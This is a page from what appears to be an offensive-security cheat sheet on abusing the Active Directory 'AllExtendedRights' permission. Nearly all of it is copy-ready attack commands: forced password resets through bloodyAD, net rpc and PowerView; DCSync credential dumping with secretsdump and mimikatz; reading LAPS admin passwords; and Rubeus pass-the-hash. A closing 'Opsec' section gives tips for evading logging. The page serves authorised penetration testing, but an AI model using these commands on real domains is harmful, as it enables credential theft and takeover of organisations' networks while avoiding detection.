🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / AllExtendedRights

AllExtendedRights

Source has all extended rights on the target β€” includes User-Force-Change-Password, DS-Replication-Get-Changes, and ReadLAPSPassword depending on target type

Applies to: User/Group/Computer β†’ User, Domain, Computer (LAPS)

Linux Abuse

Target: User β€” force password change (no old password needed)

# bloodyAD
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> set password <target-user> '<new-password>'

# net rpc
net rpc password <target-user> '<new-password>' -U <domain>/<username>%'<password>' -S <dc-ip>

Target: User β€” certificate enrollment abuse (if PKI in scope)

certipy-ad req -u <username>@<domain> -p '<password>' -ca '<ca-name>' -template User -dc-ip <dc-ip>

Target: Domain β€” DCSync (DS-Replication-Get-Changes + DS-Replication-Get-Changes-All)

secretsdump.py '<domain>/<username>:<password>' -dc-ip <dc-ip>
# Or with hash
secretsdump.py -hashes :<ntlm-hash> '<domain>/<username>' -dc-ip <dc-ip>

Target: Computer (LAPS enabled) β€” read LAPS password

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> get object '<target-computer$>' --attr ms-mcs-admpwd

# Or via ldapsearch
ldapsearch -x -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' \
    -b 'CN=<target-computer>,CN=Computers,DC=<domain>,DC=<tld>' \
    '(objectclass=computer)' ms-mcs-admpwd

# Or via netexec
nxc ldap <dc-ip> -u <username> -p '<password>' --module laps

Target: Computer (LAPS v2 / Windows LAPS) β€” read msLAPS-Password

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> get object '<target-computer$>' --attr msLAPS-Password

Windows Abuse

Target: User β€” force password change

Set-DomainUserPassword -Identity <target-user> \
    -AccountPassword (ConvertTo-SecureString '<new-password>' -AsPlainText -Force) -Credential $cred

CMD

net user <target-user> <new-password> /domain

Target: Domain β€” DCSync

mimikatz # lsadump::dcsync /domain:<domain> /user:Administrator
mimikatz # lsadump::dcsync /domain:<domain> /all /csv

Target: Computer β€” read LAPS (legacy)

Get-DomainComputer <target-computer> -Properties ms-mcs-admpwd | Select-Object -Expand ms-mcs-admpwd

Target: Computer β€” read LAPS v2

Get-DomainComputer <target-computer> -Properties msLAPS-Password | Select-Object -Expand msLAPS-Password
# Password is JSON-encoded β€” parse it

Rubeus (after getting LAPS cred β€” PTH to target)

Rubeus.exe asktgt /user:Administrator /rc4:<laps-ntlm-hash> /domain:<domain> /dc:<dc-ip> /nowrap

Opsec

  • Force-password-change logged as event 4723/4724 on DC
  • DCSync logged as 4662 (object access) β€” avoid running from a workstation, use from DC network range if possible
  • LAPS reads are LDAP queries β€” not directly logged unless LDAP audit is enabled